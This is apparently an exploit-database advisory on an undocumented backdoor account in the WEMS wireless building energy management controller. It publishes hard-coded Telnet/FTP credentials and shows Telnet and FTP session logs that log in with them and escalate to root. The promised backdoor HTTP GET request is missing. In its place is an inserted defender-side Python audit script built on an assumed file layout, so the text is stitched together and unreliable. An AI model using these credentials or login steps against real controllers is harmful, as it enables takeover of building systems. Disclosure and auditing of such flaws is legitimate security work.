Exploits / Vulnerability Discovered : 2019-12-30 |
Type : webapps |
Platform : hardware
Title: WEMS BEMS 21.3.1 Undocumented Backdoor Account
Summary: We (WEMS) offer the world's first fully wireless energy management system.
Our solution enables your organization to take control of its energy costs, by monitoring
lighting, heating and air conditioning equipment to identify wastage across multiple
sites and start saving money instantly. Additionally, we offer a service which enables
you to personally control the settings of your building - remotely, via text messaging
and the internet - from wherever you happen to be in the world.
Desc: The wireless BMS solution contains an undocumented backdoor account whose credentials
are stored Base64-encoded. These credentials are never exposed to the end user and cannot be
changed through any normal operation of the controller via the RMI. An attacker could exploit
this vulnerability by logging in with the backdoor account, which carries the highest
administrative privileges, and gain full control of the system. The check_users.sh Bash script
generates the default accounts on the system together with their passwords and privilege
levels. The backdoor user is not visible in the user settings of the admin panel, and it is
created with an undocumented privilege level 3 via the addhttpuser program, which grants full
access to every feature the WEMS offers remotely. WEMS also ships with hard-coded, weak
credentials for Telnet/FTP access: gast:glasshou and root:glasshou.
Tested on: Linux 2.6.16 armv5tejl
thttpd/2.25b
Adam 7000 System
WEMS OS 5.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Excerpt from check_users.sh (the addhttpuser call that precedes this check is not shown):
# Verify user added successfully...
# $? is the exit status of the preceding addhttpuser call; 255 signals failure.
if [ "$?" -eq "255" ]
then
echo "Error when adding logging user credentials - aborting.."
# Roll back to the shipped default account file, preserving its mode and timestamps.
cp -p /mnt/etc/httpusers.default /mnt/etc/httpusers
exit
fi
When the auth command is invoked through the cmd parameter, the cgiauth binary
reads the /mnt/etc/httpusers file and validates the supplied credentials against it.
To log in with the backdoor account the following HTTP GET request is made:
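A defender-side audit of a pulled copy of /mnt/etc/httpusers, added here as an example (it is not code from the advisory or from WEMS): it assumes a colon-separated user:base64(password):level layout, which the advisory does not document, and flags entries that are absent from the admin panel's user list, carry the undocumented privilege level 3, or use the hard-coded password named above.

```python
import base64

# Privilege level the advisory says check_users.sh hands to addhttpuser for the hidden account.
UNDOCUMENTED_LEVEL = 3
# Hard-coded password the advisory names for the Telnet/FTP accounts.
HARDCODED_PASSWORDS = {"glasshou"}
# Constructed sample. The real /mnt/etc/httpusers layout is an ASSUMPTION
# (user:base64(password):level); the advisory does not document it.
SAMPLE_HTTPUSERS = """\
admin:YWRtaW4=:2
operator:b3BlcmF0b3I=:1
svc_bms:Z2xhc3Nob3U=:3
broken line without fields
"""

def parse_httpusers(text):
    """Parse the assumed user:base64(password):level layout into dicts."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        parts = raw.strip().split(":")
        if parts == [""] or parts[0].startswith("#"):
            continue  # blank line or comment
        entry = {"line": lineno, "user": None, "password": None, "level": None}
        if len(parts) == 3:
            entry["user"] = parts[0]
            entry["level"] = int(parts[2]) if parts[2].isdigit() else None
            try:
                entry["password"] = base64.b64decode(parts[1], validate=True).decode()
            except (ValueError, UnicodeDecodeError):
                pass  # not clean Base64: leave None, audit treats it as unknown
        entries.append(entry)
    return entries

def audit_httpusers(text, panel_users):
    """Return (line, user, reasons) for entries to review; panel_users = accounts visible in the admin panel."""
    findings = []
    for e in parse_httpusers(text):
        reasons = []
        if e["user"] is None:
            reasons.append("malformed entry")
        else:
            if e["user"] not in panel_users:
                reasons.append("account not listed in the admin panel")
            if e["level"] == UNDOCUMENTED_LEVEL:
                reasons.append("undocumented privilege level 3")
            if e["password"] in HARDCODED_PASSWORDS:
                reasons.append("hard-coded default password")
        if reasons:
            findings.append((e["line"], e["user"], reasons))
    return findings
```

Running audit_httpusers(SAMPLE_HTTPUSERS, {"admin", "operator"}) reports the svc_bms entry on all three counts and the malformed fourth line, while the two panel-visible accounts pass.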
--------------------------------------------------------------------------
$ telnet 192.168.1.17
Connected to 192.168.1.17.
Escape character is '^]'.
- Adam 7000 System - Version 4.1a-usb -
WEMS login: gast
Password:
BusyBox v1.01 (2011.02.24-11:55+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
$ id
uid=500(gast) gid=500
$ su
Password:
BusyBox v1.01 (2011.02.24-11:55+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
# id
uid=0(root) gid=0(root)
# netstat -nat
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN
-----------
$ ftp 192.168.1.17
WEMS FTP server (Version wu-2.6.2(12) Thu Feb 24 14:48:47 GMT 2011) ready.
user root
331 Password required for root.
pass glasshou
230 User root logged in.